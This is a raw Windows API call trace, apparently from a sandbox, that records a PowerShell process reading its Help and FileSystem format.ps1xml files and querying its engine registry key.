	[0298.985] ReadFile (in: hFile=0x32c, lpBuffer=0x2dc18c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2dc18c8*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.985] ReadFile (in: hFile=0x32c, lpBuffer=0x2dc18c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2dc18c8*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.986] ReadFile (in: hFile=0x32c, lpBuffer=0x2dc18c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2dc18c8*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.986] ReadFile (in: hFile=0x32c, lpBuffer=0x2dc18c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2dc18c8*, lpNumberOfBytesRead=0x28cdf8*=0x119, lpOverlapped=0x0) returned 1
	[0298.986] ReadFile (in: hFile=0x32c, lpBuffer=0x2dc18c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2dc18c8*, lpNumberOfBytesRead=0x28cdf8*=0x0, lpOverlapped=0x0) returned 1
	[0298.986] CloseHandle (hObject=0x32c) returned 1
	[0298.986] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0298.986] SetErrorMode (uMode=0x1) returned 0x1
	[0298.986] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28cda0 | out: lpFileInformation=0x28cda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0298.986] SetErrorMode (uMode=0x1) returned 0x1
	[0298.986] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0298.987] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28ce88 | out: phkResult=0x28ce88*=0x32c) returned 0x0
	[0298.987] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28ce0c, lpData=0x0, lpcbData=0x28ce08*=0x0 | out: lpType=0x28ce0c*=0x1, lpData=0x0, lpcbData=0x28ce08*=0x56) returned 0x0
	[0298.987] CoTaskMemAlloc (cb=0x5a) returned 0x1b6ff740
	[0298.987] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28cddc, lpData=0x1b6ff740, lpcbData=0x28cdd8*=0x56 | out: lpType=0x28cddc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28cdd8*=0x56) returned 0x0
	[0298.987] CoTaskMemFree (pv=0x1b6ff740) 
	[0298.987] RegCloseKey (hKey=0x32c) returned 0x0
	[0298.987] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0298.987] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28c980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0298.988] VirtualQuery (in: lpAddress=0x28b920, lpBuffer=0x28c7e0, dwLength=0x30 | out: lpBuffer=0x28c7e0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0298.988] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0xfb82bca8, Data2=0x79bf, Data3=0x4f47, Data4=([0]=0xae, [1]=0xe, [2]=0xfc, [3]=0xab, [4]=0x4e, [5]=0xc8, [6]=0xf3, [7]=0x15))) returned 0x0
	[0298.988] VirtualQuery (in: lpAddress=0x28ba60, lpBuffer=0x28c920, dwLength=0x30 | out: lpBuffer=0x28c920*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0298.988] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x55192aad, Data2=0x347b, Data3=0x4e1e, Data4=([0]=0x99, [1]=0xdc, [2]=0x72, [3]=0xac, [4]=0x85, [5]=0x26, [6]=0xfa, [7]=0xa7))) returned 0x0
	[0298.988] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0xe88cb2c8, Data2=0x5e8f, Data3=0x475c, Data4=([0]=0xae, [1]=0xc2, [2]=0xb, [3]=0x87, [4]=0xf4, [5]=0x72, [6]=0x12, [7]=0xa5))) returned 0x0
	[0298.988] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x6a5cb850, Data2=0xfefa, Data3=0x46d3, Data4=([0]=0x86, [1]=0x23, [2]=0x9b, [3]=0xbb, [4]=0xa9, [5]=0x49, [6]=0x62, [7]=0xa7))) returned 0x0
	[0298.989] VirtualQuery (in: lpAddress=0x28ba60, lpBuffer=0x28c920, dwLength=0x30 | out: lpBuffer=0x28c920*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0298.989] VirtualQuery (in: lpAddress=0x28ba60, lpBuffer=0x28c920, dwLength=0x30 | out: lpBuffer=0x28c920*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0298.989] SetErrorMode (uMode=0x1) returned 0x1
	[0298.989] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0298.989] GetFileType (hFile=0x32c) returned 0x1
	[0298.989] SetErrorMode (uMode=0x1) returned 0x1
	[0298.989] GetFileType (hFile=0x32c) returned 0x1
	[0298.989] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.989] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.990] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.990] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.990] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.990] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.990] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.990] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.991] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.991] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.992] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.992] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.992] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.992] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.992] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0298.993] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.744] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.744] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.745] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.745] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.745] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.745] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.746] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.746] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.746] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.746] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.746] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.747] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.747] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.747] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.747] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.748] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.750] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.750] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.750] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.750] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.751] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.751] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.751] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.751] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.751] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.751] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.752] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.752] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.752] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.752] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.752] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.752] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.752] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.752] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.753] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.753] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.753] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.753] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.753] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.753] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.753] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.754] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.754] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.754] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.754] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.754] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.754] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0xf37, lpOverlapped=0x0) returned 1
	[0299.754] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1d107, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1d107*, lpNumberOfBytesRead=0x28cdf8*=0x0, lpOverlapped=0x0) returned 1
	[0299.754] ReadFile (in: hFile=0x32c, lpBuffer=0x2e1da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e1da68*, lpNumberOfBytesRead=0x28cdf8*=0x0, lpOverlapped=0x0) returned 1
	[0299.755] CloseHandle (hObject=0x32c) returned 1
	[0299.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0299.755] SetErrorMode (uMode=0x1) returned 0x1
	[0299.755] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28cda0 | out: lpFileInformation=0x28cda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0299.755] SetErrorMode (uMode=0x1) returned 0x1
	[0299.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
